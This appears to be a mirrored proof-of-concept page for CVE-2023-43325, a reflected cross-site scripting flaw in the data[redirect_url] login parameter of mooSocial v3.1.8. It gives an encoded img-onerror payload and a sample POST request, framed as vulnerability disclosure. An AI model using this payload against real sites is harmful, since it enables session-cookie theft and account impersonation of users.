CVE-2023-43325 PoC — mooSocial 跨站脚本漏洞

Source

https://github.com/ahrixia/CVE-2023-43325

Associated Vulnerability

Title:mooSocial 跨站脚本漏洞 (CVE-2023-43325)
Description:mooSocial是mooSocial公司的一个多平台、移动就绪、用户友好的脚本。用于构建社区驱动的内容共享和社交网络网站。 mooSocial v3.1.8版本存在跨站脚本漏洞，该漏洞源于data[redirect_url] 参数中存在跨站脚本，允许攻击者窃取用户的会话 cookie 并通过精心设计的 URL 冒充其帐户。

Description

mooSocial v3.1.8 is vulnerable to cross-site scripting on user login function.

Readme

# mooSocial: XSS (CVE-2023-43325)
A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.

Vulerable Parameter: **data[redirect_url]**

## Exploit - Proof of Concept (POC)

### Reflect cross-site scripting (XSS)
```
Payload : test"><img src=a onerror=alert(1)>test 
Payload (Base64 encoded) : dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64+Url encoded): dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d
```
POST Request on /moosocial/users/login (POST REQUEST DATA ONLY): 
```
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]
```

### Screenshot
![image](https://github.com/ahrixia/CVE-2023-43325/assets/35935843/b6b8b968-e0b5-4e70-8285-4e0abbfe8f3b)

File Snapshot


 [4.0K]  /data/pocs/bfe17fe2d900b935e6e6fa958794fe7b1129596d
└── [1.0K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!